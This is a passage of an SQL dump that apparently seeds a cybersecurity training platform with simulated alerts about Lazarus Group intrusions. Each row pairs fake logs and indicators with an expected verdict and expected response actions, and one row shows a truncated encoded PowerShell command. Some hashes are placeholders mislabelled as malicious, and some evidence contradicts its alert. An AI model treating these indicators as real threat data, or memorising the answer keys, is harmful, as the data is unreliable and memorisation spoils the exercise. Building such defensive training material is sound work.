(1474, 'Lateral Movement in Financial Systems', 'high', 'Internal Network Logs', 'Hidden Cobra extends its reach, moving laterally across the network, seeking to map out and understand the layout of Turkish financial systems for potential future exploitation.', 'Network Propagation', 'T1570: Lateral Movement', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"LM-202310151432\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"fin_map_tool.exe\",\"event_type\":\"file_transfer\",\"action\":\"succeeded\",\"protocol\":\"SMB\",\"description\":\"Malicious tool transferred for lateral movement in financial systems\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP targeted by attacker for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Hidden Cobra operations\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with financial system mapping malware linked to Hidden Cobra\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"fin_map_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"File used for network mapping in financial systems\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised for lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1475, 'Data Exfiltration and Reconnaissance', 'high', 'Data Loss Prevention (DLP)', 'The final stage of the operation involves exfiltrating sensitive data, including financial transaction details, to support intelligence and financial theft objectives. Detected data exfiltration activity from an internal network to an external IP address associated with known Lazarus Group operations.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.20.30.40\",\"destination_ip\":\"203.0.113.45\",\"filename\":\"financial_transactions_2023.csv\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"j.doe\",\"action\":\"exfiltration_attempt\",\"protocol\":\"HTTPS\",\"bytes_sent\":1048576,\"detection_method\":\"DLP\"}', '2026-03-15 19:06:37', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"File hash linked to data exfiltration malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP address.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_transactions_2023.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Audit Logs\",\"verdict\":\"malicious\",\"details\":\"Sensitive financial data targeted for exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.854Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.20.30.40\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"financial_transactions_2023.csv\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"j.doe\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"bytes_sent\\\":1048576,\\\"detection_method\\\":\\\"DLP\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1476, 'Initial Access Through Spear Phishing', 'high', 'Email Gateway Logs', 'The Lazarus Group initiated an initial access attempt through spear-phishing emails targeting employees in the defense sector. The emails contained job recruitment lures designed to entice the recipient into opening a malicious attachment that deploys the Rising Sun implant.', 'Spear Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:11Z\",\"email_id\":\"c3f8a1b002d45@example.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"sender_email\":\"recruitment@fakejobs.com\",\"recipient_email\":\"jane.doe@defenseco.com\",\"subject\":\"Exciting Job Opportunity in Defense\",\"attachment\":{\"filename\":\"JobOffer.docx\",\"hash\":\"3e5f7e1b7e2b6c8a9e8f7d6b5c3a4f2e\"},\"malicious_indicator\":true}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"recruitment@fakejobs.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e5f7e1b7e2b6c8a9e8f7d6b5c3a4f2e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rising Sun implant.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access Through Spear Phishing\",\"date\":\"2026-03-15T20:58:14.860Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1477, 'Execution of Rising Sun Implant', 'high', 'Endpoint Detection and Response (EDR) Logs', 'The Rising Sun implant was executed on a compromised system, providing remote access to the attackers. This is a critical step in the advanced persistent threat operation, likely preparing for data exfiltration or further exploitation.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"evt-20231012-1024\",\"source_ip\":\"45.83.123.123\",\"destination_ip\":\"192.168.1.101\",\"user\":\"compromised_user\",\"process_name\":\"rising_sun.exe\",\"process_hash\":\"3a5f2c7d8c1f4e6d9f8b2e3c4d5f6a7b\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\rising_sun.exe\",\"command_line\":\"rising_sun.exe -silent\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":4321,\"action\":\"Execution\",\"status\":\"Success\"}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.83.123.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"rising_sun.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Executable related to Rising Sun implant\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a5f2c7d8c1f4e6d9f8b2e3c4d5f6a7b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rising Sun malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1478, 'Establishing Persistence - Advanced Threat Actor Activity Detected', 'high', 'Windows Event Logs', 'Suspicious persistence mechanism detected potentially linked to Lazarus Group. The attacker has implemented a Windows service to maintain access through system reboots and user logouts.', 'Persistence Mechanism', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"event_id\":7045,\"timestamp\":\"2023-10-15T02:14:07Z\",\"computer_name\":\"compromised_host01\",\"user\":\"NT AUTHORITY\\\\SYSTEM\",\"service_name\":\"UpdateService\",\"service_file_name\":\"C:\\\\Windows\\\\System32\\\\drivers\\\\msupdate.exe\",\"service_type\":\"Own Process\",\"start_type\":\"Auto Start\",\"ip_address\":\"10.0.0.45\",\"external_ip\":\"203.0.113.45\",\"sha256\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\",\"tags\":[\"Lazarus Group\",\"Persistence\",\"APT\"]}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous Lazarus Group activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious software used by Lazarus Group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:57:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:56:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:55:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"},{\"timestamp\":\"2026-03-15T20:54:14.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":7045,\\\"timestamp\\\":\\\"2023-10-15T02:14:07Z\\\",\\\"computer_name\\\":\\\"compromised_host01\\\",\\\"user\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\drivers\\\\\\\\msupdate.exe\\\",\\\"service_type\\\":\\\"Own Process\\\",\\\"start_type\\\":\\\"Auto Start\\\",\\\"ip_address\\\":\\\"10.0.0.45\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"sha256\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A new service was installed in the system which is not known to be legitimate. The service file has a suspicious hash.\\\",\\\"tags\\\":[\\\"Lazarus Group\\\",\\\"Persistence\\\",\\\"APT\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1479, 'Lateral Movement Across Network', 'high', 'Network Traffic Analysis', 'Utilizing harvested credentials, the attackers moved laterally within the network, targeting additional systems in the nuclear and energy sectors. This activity is consistent with advanced persistent threats known for targeting critical infrastructure.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.25\",\"username\":\"jdoe\",\"filename\":\"mimikatz.exe\",\"hash\":\"4bfa3a6d5ac6a7f8a3b0a9a7f5c3e2b1\",\"event_type\":\"lateral_movement\",\"network_protocol\":\"SMB\",\"action\":\"credential_dumping\",\"malware_tool\":\"Mimikatz\",\"notes\":\"The attacker used Mimikatz to extract credentials and moved laterally to 10.1.1.25, a critical system within the network.\"}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical system within the nuclear sector.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Mimikatz is a known tool for credential dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"4bfa3a6d5ac6a7f8a3b0a9a7f5c3e2b1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1480, 'Exfiltration of Sensitive Data', 'critical', 'Data Loss Prevention (DLP) Tools', 'The Lazarus Group has initiated data exfiltration targeting critical defense strategies and nuclear research. This could lead to severe national security implications.', 'Data Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:23Z\",\"event\":\"data_exfiltration\",\"source_ip\":\"192.168.45.12\",\"destination_ip\":\"203.0.113.57\",\"filename\":\"nuclear_research_plans.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"dlp_policy_triggered\":\"Sensitive Data Exfiltration\",\"malware_tool_used\":\"custom_exfil_tool_v1.2\"}', '2026-03-15 19:07:00', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.45.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nuclear_research_plans.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Local DLP\",\"verdict\":\"suspicious\",\"details\":\"File matches patterns of sensitive documents.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified in previous Lazarus Group campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account. Possible credential compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 